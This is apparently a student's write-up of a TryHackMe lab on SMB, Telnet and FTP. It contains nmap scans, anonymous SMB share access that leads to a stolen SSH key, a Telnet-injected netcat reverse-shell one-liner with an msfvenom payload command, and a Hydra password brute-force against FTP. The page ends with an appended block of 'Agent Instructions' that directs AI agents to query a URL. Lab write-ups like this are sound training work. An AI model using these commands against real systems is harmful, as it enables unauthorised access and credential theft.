# Network Services ### Task 2 - Understanding SMB #### All Things about SMB **What is SMB?** *Server Message Block Protocol* - a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. **What runs SMB?** ``` Samba, an open source server that supports the SMB protocol. ``` **Type of protocol is SMB?** ``` response-request ``` **Connect to servers using?** ``` tcp/ip. ``` *** ### Task 3 - Enumerating SMB **Enumeration** Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation. ``` all things against Bruno Fraga. ``` **SMB** Typically, there are SMB share drives on a server that can be connected to and used to view or transfer files. *Often be a great starting point for an attacker looking.* **Port Scanning (Nmap)** The first step of enumeration is to conduct a port scan. **Enum4Linux** ```bash syntax: "enum4linux [options] ip" ``` A tool used to enumerate SMB shares on both Windows and Linux systems. ## 10.10.96.104 - polosmb3 ### Nmap Scan ```bash root@ip-10-10-70-123:~# nmap -sC -sV -vvv 10.10.96.104 Starting Nmap 7.60 ( https://nmap.org ) at 2023-05-01 02:51 BST NSE: Loaded 146 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 02:51 Completed NSE at 02:51, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 02:51 Completed NSE at 02:51, 0.00s elapsed Initiating ARP Ping Scan at 02:51 Scanning 10.10.96.104 [1 port] Completed ARP Ping Scan at 02:51, 0.22s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 02:51 Completed Parallel DNS resolution of 1 host. at 02:51, 0.00s elapsed DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 02:51 Scanning ip-10-10-96-104.eu-west-1.compute.internal (10.10.96.104) [1000 ports] Discovered open port 22/tcp on 10.10.96.104 Discovered open port 139/tcp on 10.10.96.104 Discovered open port 445/tcp on 10.10.96.104 Completed SYN Stealth Scan at 02:51, 1.26s elapsed (1000 total ports) Initiating Service scan at 02:51 Scanning 3 services on ip-10-10-96-104.eu-west-1.compute.internal (10.10.96.104) Completed Service scan at 02:51, 11.02s elapsed (3 services on 1 host) NSE: Script scanning 10.10.96.104. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 02:51 Completed NSE at 02:51, 0.30s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 02:51 Completed NSE at 02:51, 0.00s elapsed Nmap scan report for ip-10-10-96-104.eu-west-1.compute.internal (10.10.96.104) Host is up, received arp-response (0.00092s latency). Scanned at 2023-05-01 02:51:20 BST for 13s Not shown: 997 closed ports Reason: 997 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsQBsFkx22xGvnoVM2jdoshYhErSrOah7KuFFxx17bNXpP0ngmmi8eg8cF15/W09dFRZkHpolm+hwczAJg8YtCikckf57z6tuMZIJG97TEFjtevvyw2hB7YjUJXCsQOkGKUkHs8q1QqiTX0jFaM/LQdZm+77MxuaU8XXbcghfHISAyh2++AwD6LIIJvVKk/1vjMHO6GtgoyvVmlVrITZv+5naaAUgfyqoKJr2mfsJDl8MpalE4Fb9aXP2LopBgQ5YetpjFI4kyvxlaZZ86nrvvCc5FZWXM5ezfJT1R8fIaM8+3rY/6ktlVzQ/C3fNqJaT9YolYOYcQuHZ1mJ7rrE0P | 256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCdRH8y2bhSww6mxtO3NwyfVfbhPCFZ8RxKhZrmc4LoqyRvJhmISqcY/e9JmkvjeqFx+QLGsadZo3ap9QyVuDAE= | 256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (EdDSA) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBOdFR83uui/AaLq3bUcJ0REIIL0laVVmSMvkeVpGWd1 139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) MAC Address: 02:59:8A:A4:FC:1D (Unknown) Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 0s, deviation: 0s, median: 0s | nbstat: NetBIOS name: POLOSMB, NetBIOS user: , NetBIOS MAC: (unknown) | Names: | POLOSMB<00> Flags: | POLOSMB<03> Flags: | POLOSMB<20> Flags: | \x01\x02__MSBROWSE__\x02<01> Flags: | WORKGROUP<00> Flags: | WORKGROUP<1d> Flags: | WORKGROUP<1e> Flags: | Statistics: | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 12104/tcp): CLEAN (Couldn't connect) | Check 2 (port 25620/tcp): CLEAN (Couldn't connect) | Check 3 (port 30020/udp): CLEAN (Failed to receive data) | Check 4 (port 57853/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: polosmb | NetBIOS computer name: POLOSMB\x00 | Domain name: \x00 | FQDN: polosmb |_ System time: 2023-05-01T01:51:33+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2023-05-01 02:51:33 |_ start_date: 1600-12-31 23:58:45 NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 02:51 Completed NSE at 02:51, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 02:51 Completed NSE at 02:51, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds Raw packets sent: 1002 (44.072KB) | Rcvd: 1002 (40.080KB) ``` ## Second: ```bash root@ip-10-10-70-123:~# nmap -sS -sV -sC -p- -vv -T5 10.10.96.104 Starting Nmap 7.60 ( https://nmap.org ) at 2023-05-01 02:59 BST NSE: Loaded 146 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 02:59 Completed NSE at 02:59, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 02:59 Completed NSE at 02:59, 0.00s elapsed Initiating ARP Ping Scan at 02:59 Scanning 10.10.96.104 [1 port] Completed ARP Ping Scan at 02:59, 0.22s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 02:59 Completed Parallel DNS resolution of 1 host. at 02:59, 0.00s elapsed Initiating SYN Stealth Scan at 02:59 Scanning ip-10-10-96-104.eu-west-1.compute.internal (10.10.96.104) [65535 ports] Discovered open port 22/tcp on 10.10.96.104 Discovered open port 445/tcp on 10.10.96.104 Discovered open port 139/tcp on 10.10.96.104 Warning: 10.10.96.104 giving up on port because retransmission cap hit (2). SYN Stealth Scan Timing: About 25.42% done; ETC: 03:01 (0:01:31 remaining) SYN Stealth Scan Timing: About 49.40% done; ETC: 03:01 (0:01:02 remaining) ``` *** ### Task 4 - Exploiting SMB **Types of SMB Exploit** Method Breakdown * The SMB share location * The name of an interesting SMB share **Syntax:** ```bash smbclient //10.10.10.2/secret -U suit -p 139 ``` ┌──(root㉿kali)-\[\~] └─# smbclient [//10.10.174.46/profiles](https://public-8.gitbook.io/rapha/ctfs/tryhackme/rooms/10.10.174.46/profiles) -U Anonymous ```bash get "Working From Home Information.txt" ``` ``` ┌──(root㉿kali)-[/home/kali] └─# cat Working\ From\ Home\ Information.txt ``` ``` Nome: John Cactus - **ssh access** ``` `cd .ssh` > `ls` `get id_rsa` ***in my terminal:*** `chmod 600 id_rsa` ``` ┌──(root㉿kali)-\[/home/kali\] └─# ssh -i id_rsa cactus@10.10.174.46 ``` `after: ls > cat "".txt > flag.` *** ### Task 4 - Exploiting SMB **What is Telnet?** `application protocol: connect and execute commands on a remote machine through the telnet client that's hosting a telnet server.` **Replacement *****for SSH*** ``` All messages in clear text and has no specific security mechanisms. Telnet replaced by SSH (cryptography). ``` **How does Telnet work?** ``` User connects to the server by using the Telnet protocol. ``` `syntax: telnet telnet [ip] [port]` *** ### Task 6 - Enumerating Telnet `Enumeration stage` `1 open port: 8012/tcp` `syntax: nmap -A -vv -p 8012 10.10.15.23` ``` Quest example: ``` ```bash Ask: ``` *** ### Task 7 - Exploiting Telnet **Types of Telnet Exploit** Method Breakdown Enumeration stage, we know: * A poorly hidden telnet service running on this machine * The service itself is marked "backdoor" * We have possible username of "Skidy" implicated **Connecting to Telnet** `syntax: "telnet [ip] [port]"` **What is a Reverse Shell?** ``` a piece of code or program which can be used to gain code or command execution on a device. Target machine communicates back to the attacking machine. ``` ``` The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved. ``` `syntax: sudo tcpdump ip proto \\icmp -i tun0` This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on. `"ping [local THM ip] -c 1" // ping 10.10.72.61 -c 1` **in case is my machine** ``` NOW generate a reverse shell payload using msfvenom... ``` `our syntax: "msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip]**MY PC** lport=4444 R"` `For Telnet command injection:` For use in Telnet: **.RUN mkfifo /tmp/xoza; nc 10.10.59.43 4444 0\/tmp/xoza 2>&1; rm /tmp/xoza** BUT: `Open nc:` `netcat syntax: "nc -lvp [listening port]"` `used: nc -l"n"vp 4444` ```bash Open: ``` `In telnet conection:` `For open Reverse Shell:` *** ### Task 8 - Understanding FTP **What is FTP?** File Transfer Protocol: protocol used to allow remote transfer of files over a network. `ftp default port: 21` **How does FTP work?** FTP operates using a client-server protocol. The client initiates a connection with the server, the server validates whatever login credentials are provided and then opens the session. **Active vs Passive** The FTP server support either Active or Passive connections, **or both.** * In an Active FTP connection, the client opens a port and listens. The server is required to actively connect to it. * In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it. ### Task 9 - Enumerating FTP **Lets Get Started** * Enumeration `nmap > "tool [-h / -help / --help]"; "man [tool]"` * Method `We're Going to be exploiting an anonymous FTP login, to see what files we can access- and if they contain any information that might allow us to pop a shell on the system. This is a common pathway in CTF challenges, and mimics a real-life careless implementation of FTP servers.` * Resources `Need FTP client was installed on the system.` `syntax: "sudo apt install ftp" to install one.` * Alternative Enumeration Methods `FTP server variants return different responses to the "cwd". {because you can issue cwd commands before authentication}` ```bash This vulnerability is documented at: https://www.exploit-db.com/exploits/20745 ``` *** ``` Step-byStep: 1. Run nmap's: 1. Fast nmap for quick enumeration and start. ┌──(root㉿kali)-[~] └─# nmap -T4 10.10.253.225 ``` ``` 2. Enumeration ports found. ┌──(root㉿kali)-[~] └─# nmap -A -vvv -p 21, 80 10.10.253.225 | tee /home/kali/Documents/nmaps/ftpfinal ``` `-Pn because: Host seems down. If it is really up, but blocking our ping probes, try -Pn` ``` 3. Checking possible ports. ┌──(root㉿kali)-[~] └─# nmap -sS -sC -sV -p- -vv -T5 10.10.253.225 ``` ``` 2. Connect FTP: ``` ``` 3. Cat file [PUBLIC_NOTICE.txt] ``` ```bash ┌──(root㉿kali)-[/home/kali] └─# cat PUBLIC_NOTICE.txt =================================== MESSAGE FROM SYSTEM ADMINISTRATORS =================================== Hello, I hope everyone is aware that the FTP server will not be available over the weekend- we will be carrying out routine system maintenance. Backups will be made to my account so I reccomend encrypting any sensitive data. Cheers, Mike ``` *** ### Task 10 - Exploiting FTP **Types of FTP Exploit** Similarly to Telnet, using FTP both the command and data channels are unencrypted. man-in-the-middle attack can be intercepted and read, an attacker could reveal anything sent through this protocol. **Method Breakdown** Our enumeration stage, we know: ``` - There is an FTP server running on this machine - We have a possible username ``` let's try and bruteforce the password of the FTP Server. **Hydra** Hydra is a very fast online password cracking tool, which can perform rapid dictionary. Attacks Protocols against: Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases... download hydra: `syntax: "hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp"` Practice: ``` Our case: ┌──(root㉿kali)-[/home/kali] └─# hydra -t 50 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.253.225 ftp ``` `Play hydra:` `Find password, id: mike / password: password` `Login ftp, └─# ftp 10.10.253.225 > id / password.` `└─# cat ftp.txt` *** ### Task 11 - Expanding Your Knowledge **Further Learning** **Reading** ``` Some things it interests you: ``` * * * *** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://public-8.gitbook.io/rapha/ctfs/tryhackme/rooms/network-services.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.